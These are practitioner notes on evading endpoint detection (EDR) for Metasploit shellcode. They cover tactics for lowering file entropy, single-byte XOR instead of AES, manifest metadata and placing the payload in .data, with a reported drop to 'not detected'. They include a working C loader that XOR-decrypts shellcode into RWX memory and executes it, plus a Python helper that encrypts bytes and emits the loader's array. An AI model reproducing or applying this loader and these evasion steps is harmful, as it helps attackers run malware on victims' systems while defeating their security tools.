EDR Evasion
Entropy:
EDR static scanners flag abnormally high Shannon entropy: encrypted or packed data sits close to the 8.0 bits/byte maximum, while ordinary PE files measure somewhere between 4.8 and 7.2. Aim to keep the whole file (and each section) inside that normal range, and measure it with pestudio, which reports entropy per file and per section.
Encryption:
XOR keeps the entropy low: a single-byte key only permutes byte values, so the byte histogram (and therefore the entropy) of the payload stays exactly where it was. AES output is indistinguishable from random bytes, so it pushes the section towards 8.0 bits/byte, which is precisely what the scanner flags.
Metadata:
Add an empty manifest file to the Visual Studio project (Visual Studio fills it with metadata automatically) and name it to match the executable. This works well against EDR static analysis: the binary now carries legitimate-looking metadata instead of presenting as an anonymous blob and was no longer identified. In the author's measurement, adding the manifest metadata also lowered the file's entropy from 5.033 to 4.922.
.data:
Declaring the shellcode buffer as a global variable, so it is stored in the .data section instead of on the stack inside main(), decreased the entropy and, where the sample was identified at all, dropped the EDR risk rating from medium to low (not detected).
#include <stdio.h>
#include <string.h>
#include <windows.h>

// Replace with your XOR-encrypted MSF shellcode. Declared globally so it lives in .data
// rather than on the stack; the string-literal form adds an implicit trailing NUL.
unsigned char code[] = "\xa6\x12\xd9\xbe\xaa\xb2\x96\...";

int main(void) {
    // Single-byte XOR key: must be the same byte the shellcode was encrypted with
    unsigned char key = 'A';

    // Decrypt the shellcode in place (sizeof(code) - 1 skips the literal's trailing NUL)
    for (size_t i = 0; i < sizeof(code) - 1; i++) {
        code[i] ^= key;
    }

    // Allocate memory for the decrypted shellcode (RWX is itself a common detection signal)
    void *exec = VirtualAlloc(NULL, sizeof(code), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (exec == NULL) {
        return 1;
    }

    // Copy the decrypted shellcode into the allocated memory and execute it
    memcpy(exec, code, sizeof(code));
    ((void (*)(void))exec)();
    return 0;
}
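To check the entropy claims in the Entropy and Encryption notes above, and to produce the XOR-encrypted array the loader expects, here is an added Python helper. It is not part of the original notes and is not msfvenom or pestudio output: the "shellcode" bytes are a constructed stand-in with a realistic share of zero bytes, the key and seed are arbitrary, and the SHA-256 keystream only stands in for AES ciphertext, whose bytes are likewise close to uniform.

```python
import hashlib
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 .. 8.0), the measure pestudio reports."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def xor_encrypt(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR (symmetric: the same call decrypts).

    A one-byte key is a fixed permutation of byte values, so the byte histogram and
    therefore the entropy are unchanged; a longer key maps one plaintext value to
    several ciphertext values and pushes the entropy up.
    """
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def prf_stream(seed: bytes, length: int) -> bytes:
    """Hash-based keystream, used here only as a stand-in for AES output:
    like any good cipher its bytes are near-uniform, so entropy lands near 8.0."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(seed + counter.to_bytes(4, "big")).digest()
        counter += 1
    return bytes(out[:length])


def to_c_array(data: bytes, name: str = "code") -> str:
    """Emit the buffer in the string-literal array form the loader above uses."""
    body = "".join(f"\\x{b:02x}" for b in data)
    return f'unsigned char {name}[] = "{body}";'


# Constructed stand-in for raw x64 shellcode (NOT real msfvenom output): a 16-byte
# instruction-like pattern with eight zero bytes, repeated to 4096 bytes.
SAMPLE = bytes.fromhex("488b050000000048" "89c1e800000000c3") * 256


def compare() -> dict:
    """Entropy of SAMPLE under each treatment discussed in the notes."""
    return {
        "plain": shannon_entropy(SAMPLE),
        "xor_1byte": shannon_entropy(xor_encrypt(SAMPLE, b"A")),
        "xor_4byte": shannon_entropy(xor_encrypt(SAMPLE, b"ABCD")),
        "aes_like": shannon_entropy(prf_stream(b"demo-seed", len(SAMPLE))),
    }


if __name__ == "__main__":
    for name, h in compare().items():
        print(f"{name:10s} {h:.3f} bits/byte")
    # Array to paste into the loader (first 16 bytes shown, key 'A')
    print(to_c_array(xor_encrypt(SAMPLE[:16], b"A")))
```

Run it and the single-byte XOR result matches the plaintext entropy exactly, the four-byte key raises it, and the cipher-like stream sits just under 8.0. Two caveats a practitioner should keep in mind: with a single-byte key every 0x00 in the shellcode becomes the key byte itself, so the long zero runs typical of msfvenom output hand the key to any scanner that looks for them; and the C string-literal form appends a NUL, which is why the loader's loop stops at sizeof(code) - 1.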